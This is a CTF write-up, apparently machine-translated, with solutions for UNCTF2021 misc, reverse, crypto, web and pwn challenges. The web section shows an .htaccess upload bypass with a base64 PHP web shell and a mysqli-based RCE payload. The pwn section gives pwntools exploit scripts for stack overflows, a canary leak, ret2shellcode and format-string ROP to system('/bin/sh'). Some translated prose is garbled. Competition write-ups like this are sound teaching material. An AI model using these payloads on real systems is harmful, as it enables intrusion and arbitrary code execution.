UNCTF2021 partial writeup

Misc

Simple log audit

Before updating the attachment, the flag was in the description. The update was put in the attachment at 18:00 p.m. on November 29

In short, there are three base64 strings in total. You can see the flag after decryption. Do you want to / forget the flag

UNCTF{CTF?YouShouJiuXing}

telecommunication fraud

Variant Caesar

s = 'qi]m^roVibdVbXUU`h'
# f = 'unctf'
for i in range(len(s)):
    print(chr(ord(s[i]) +4+i),end='')
unctf{yauoreright}

Lead the flow, happy

Modify jpg height

UNCTF{BellalaBella}

LPL

An error is reported when PNG is put into 010, and the CRC value is exactly 000000??, hex gets the decompression password

hex 4544476e622121, the password is EDGnb!!

After unlocking, I gave a link and time to station b, either looking for the comment area or looking for the bullet screen, and found the flag in the comment area

flag{LpL_zgbr_rNg_eDg777}

Handstand Shampoo

Given a string of hexadecimal, use notepad++ hex to get the inverted jpg. Python writes a script and turns it back

open('flag.jpg','wb').write(open('key.txt','rb').read()[::-1])

Then I found that FFD8 was changed to D8FF, just change it back, and then I found the upper left corner

So I went to see the data section

After decoding, I'm serious. It's really unnecessary to change the Buddha's saying into a day..

unctf{it_is_easy_right?}

Re

ezlogin

Just find the key code and reverse it

s = 'pqsd`fl{zmpZsag}wdYVkUNC'
for i in range(5):
    for j in range(3):
        print(chr(ord(s[i+j*8])^22),end='')
flag{refOrL@ve}

rejunk

A pile of garbage is piled up. Just look at the key points directly

s = 'WQGULxb>2:ooh95=\'\'twk'
for i in range(len(s)):
    print(chr((ord(s[i])^i)-2),end='')
UNCTF{b781cbb29054db}

py_trade

Bytecode, it's over

# true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
flag = 'AAAAAAAAAAAAAAAAAA'
num = [0]*18
k = 0
for i in range(len(flag)):
    num[i] = (ord(flag[i])+i)^(k%3+1)
    num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
    k += 1
print(num)

Then it is found that each bit is independent. Just look at its value after running

true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
flag = ['A']*18
num = [0]*18
k = 0
for n in range(len(flag)):
    for j in range(32,128):
        flag[n] = chr(j)
        for i in range(len(flag)):
            num[i] = (ord(flag[i])+i)^(k%3+1)
            num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
            k += 1
        if(true_flag[n] == num[n]):
            flag[n] = chr(j)
            break
# print(num)
print(''.join(flag))

#py_Trad3_1s_fuNny!

Just pack UNCTF

UNCTF{py_Trad3_1s_fuNny!}

Crypto

easy_rsa

q= 9961202707366965556741565662110710902919441271996809241009358666778850435448710324711706845973820669201482939820488174382325795134659313309606698334978471
p= 12525187149887628510447403881107442078833803097302579419605689530714690308437476207855511625840027119860834633695330551080761572835309850579517639206740101
c= 28587419802025513525354713621431206010395084854419372005671024739235625817936539010481222419824634956610184430308528941304950093228826213143262329902946812513518444587906469224383320964300417189270202019231856531012143472434842753891213128487132962453421971000901646523331476667655739056951415917218673801225
e = 65537

import gmpy2
import binascii

n = p*q
L = (p-1)*(q-1)
d = gmpy2.invert(e,L)
m = gmpy2.powmod(c,d,n)

print(binascii.unhexlify(hex(m)[2:]))
UNCTF{Th1s_1s_f1ag_f0r_unctf_2021!!}

Exploring medieval castles

Caesar + base64 + fence

UNCTF{subscribe_to_Xiangwandamowang}

Analyze badusb flow

This question doesn't put misc grass

f = open('separate.txt','r').readlines()
mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }
for i in range(len(f)):
    num = int(f[i][2:4],16)
    if(f[i][0] == '2'):
        if(num in mappings):
            print(mappings[num].upper(),end='')
    else:
        if (num in mappings):
            print(mappings[num].lower(), end='')
            
            
#output:UNCTF[Y0u-Are-very-n1ce]

[] can be replaced by {}, because press shift

UNCTF{Y0u-Are-very-n1ce}

baby_rsa

dp leakage

import gmpy2
import libnum
n= 27023180567533176673625876001733765250439008888496677405372613659387969480500400831799338479404533734632060401129194207025095826786316107611502577395964365591899893794206238112244571942694129959717225168573059987542436467778426312967832431595178558711258027999897974942046398583397445299861338203860420721585460676138091828032223153425728023656897880166788811969523526091221520293020106530587453637600349533427641518473788620430866128331962450325767202417824455886116760280239705754222948387172102353564657340216229891342124971948458724351338597649821310431397426705701275774039588035776573373417654649168810548916141
c= 3489599657527403893851973553294684608504140532554562294027722218597464669848608337663997115805201027340092733823019661706872544231209523772845492398492677185660213963118144668038183924970370481476141221609706208064428560732214361469135212057355342825193598971775551833240699393482839422273480793244841531126642199202744610656153155545415859410361595564197685655133074582118230993519133935533313364233668337427608419528430102794052261190930670933657287272452581248934890029409559234507626012423255430699687038808658327174609660874748540185589263800447650242593224189976058739054174360024536594384447518687126891675059
e= 65537
p = gmpy2.gcd(n,c)
q = n//p
phi = (q-1)*(p-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m//p)))

Telecom fraud pro

I feel obvious rot47... (?

Although I still subtract first and find that there is a difference of 64 between unctf and unctf,

Anyway rot47, move 64 out

unctf{5Yir6Kej5LqG77yM6YKj5Liq5bCx5pivZmxhZw}

Don't solve the middle one. That's flag

Web

fuzz_md5

Replace unctf with null, double write bypass

Blow up an md5 beginning with 66666

import hashlib
for i in range(9999999):
    data = str(i).encode()
    m = hashlib.md5(data)
    m = m.hexdigest()
    if(m[:5] == '66666'):
        print(i)
#1004649

babywrite

https://www.anquanke.com/post/id/241147#h3-18

https://www.cnblogs.com/doherasyang/p/14571302.html

The original title was adapted and reported an error. I saw that it was apache middleware, so I used. htaccess to obtain the flag

The original question is POST. Here, GET line feed can be changed%0a

?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .ppt%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=mn.ppt"

?filename=mn.ppt&content=GIF89a12%0APD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==

Finish

phpmysql

This is echo new d b u s e r ( db_user( dbu # ser(db_pwd); to execute the command

Exception handling is used to change the normal flow of the script when a specified error occurs. It is a built-in exception handling class in php

ReflectionClass or ReflectionMethod are common reflection classes, which can be understood as a class mapping

This can be used as the test site of ctfshow web109 to report an error to RCE. Although an error is reported, the internal commands have been executed. This class must have _toString() magic methods. Here, exception, mysqli, ReflectionClass, etc. can be used

POST:host=127.0.0.1&port=3306&pwd=system('ls /')&user=mysqli

POST:host=127.0.0.1&port=3306&pwd=system('tac /fllllaaaaag')&user=mysqli

Pwn

magic_int

An int overflow and a stack overflow of puts

Put will count the newline character. I always + 8... In ret, but later I found that it was + 7

from pwn import *
p = remote('node2.hackingfor.fun',30993)
p.send('2147483648\x00')
p.recv()
payload = 'a'*(0x70+7)+p64(0x400781)
p.sendline(payload)
p.interactive()

fo

fmt hits canary and the stack overflows

from pwn import *

p=remote('node2.hackingfor.fun',36767)
context.log_level='debug'
p.sendlineafter('you?\n','%17$p')
p.recvuntil('0x')
canary=int(p.recv(16),16)
success('canary:'+hex(canary))
p.sendlineafter('wait for your good news...\n','a'*0x58+p64(canary)+p64(0)+p64(0x40080d))
p.interactive()

sc

ret2shellcode

from pwn import *

p=remote('node2.hackingfor.fun',31483)
context.arch='amd64'
context.log_level='debug'
p.sendlineafter('show me your Migic',str(asm(shellcraft.sh())))
p.sendlineafter('Have you finished?\n','a'*0x18+p64(0x601080))
p.interactive()

ezfsb

printf covers decimals and large numbers, and then the stack overflows to take the shell. printf format string covers small numbers and large numbers. It is available on wiki and can be learned by Mengxin

Then, after system('code '), call the read function, write out / bin/sh as the parameter of system, and call system('bin/sh')

from pwn import *
elf = ELF('./pwn')
context.log_level='debug'
p = remote('node2.hackingfor.fun',32119)
a_addr = 0x0804A050
p.recvuntil('hard!')
# payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
payload = 'aa%7$naa' + p32(a_addr)
p.sendline(payload)
p.recvuntil('right')
p.recv()
# payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
p.sendline(fmtstr_payload(5,{0x0804A04D:0x22}))
p.recvuntil('good')
payload = 'a'*(0x74+4)+p32(elf.plt['read'])+p32(0x080486d9)+p32(0)+p32(0x804ab00)+p32(0x4)+p32(elf.plt['system'])+p32(0)+p32(0x804ab00)
p.sendline(payload)
p.interactive()

Tags: CTF Information Security

Posted on Mon, 06 Dec 2021 22:59:08 -0500 by danago